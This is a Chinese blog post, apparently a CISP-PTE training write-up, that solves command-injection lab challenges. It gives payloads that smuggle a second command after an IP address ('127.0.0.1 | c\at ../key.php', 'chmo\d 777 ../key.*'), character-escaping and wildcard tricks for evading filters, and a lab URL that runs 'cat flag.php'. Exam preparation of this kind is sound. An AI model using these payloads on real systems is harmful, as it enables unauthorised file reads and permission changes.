当前位置:网站首页>2022 CISP-PTE(三)命令执行
2022 CISP-PTE(三)命令执行
2022-07-03 06:13:00 【Aτθ】
一、第一道
1、题目环境
2、拿key
2.1、获取目录
127.0.0.1 | ls
127.0.0.1 | ls ../
2.2、读取文件
常用命令执行函数:
system("ls");
eval、exec
linux读文件: cat、tac、less、more、head、tail
ca\t、ca''t、cat""t
如果对key.php做了过滤:
key.* k{
e}y.php k?y.php
127.0.0.1 | c\at ../key.php
127.0.0.1 | t\ac ../key.php
第二道
1、题目环境
2、解题步骤
2.1 获取目录
2.2 提升权限
127.0.0.1 & l\s -al ../key.*
127.0.0.1 & chmo\d 777 ../key.*
127.0.0.1 & l\s -al ../key.*
2.3 获取key
127.0.0.1 & t\ac ../key.*
三、第三道
1、题目环境
2、解题步骤
第四道
1、题目环境
2、解题步骤
2.1、ls
2.2、获取key
http://81.70.245.6:50289?c=cat flag.php;
边栏推荐
- Kubesphere - build MySQL master-slave replication structure
- 智牛股项目--04
- Leetcode solution - 02 Add Two Numbers
- Project summary --2 (basic use of jsup)
- tabbar的设置
- The most classic 100 sentences in the world famous works
- 深入解析kubernetes controller-runtime
- Simple solution of small up main lottery in station B
- Apifix installation
- 轻松上手Fluentd,结合 Rainbond 插件市场,日志收集更快捷
猜你喜欢
Simple understanding of ThreadLocal
Scripy learning
Es remote cluster configuration and cross cluster search
Redis cluster creation, capacity expansion and capacity reduction
Understand the first prediction stage of yolov1
Cesium 点击获三维坐标(经纬度高程)
Detailed explanation of contextclassloader
Reinstalling the system displays "setup is applying system settings" stationary
Skywalking8.7 source code analysis (I): agent startup process, agent configuration loading process, custom class loader agentclassloader, plug-in definition system, plug-in loading
项目总结--01(接口的增删改查;多线程的使用)
随机推荐
Understand expectations (mean / estimate) and variances
Install VM tools
PMP notes
Bio, NiO, AIO details
Kubernetes notes (VI) kubernetes storage
GPS坐标转百度地图坐标的方法
Kubesphere - build MySQL master-slave replication structure
Exportation et importation de tables de bibliothèque avec binaires MySQL
Use selenium to climb the annual box office of Yien
Mysql database
Svn branch management
ruoyi接口权限校验
Luogu problem list: [mathematics 1] basic mathematics problems
Read blog type data from mysql, Chinese garbled code - solved
Mysql
Common interview questions
The most responsible command line beautification tutorial
Advanced technology management - do you know the whole picture of growth?
JDBC connection database steps
Use abp Zero builds a third-party login module (I): Principles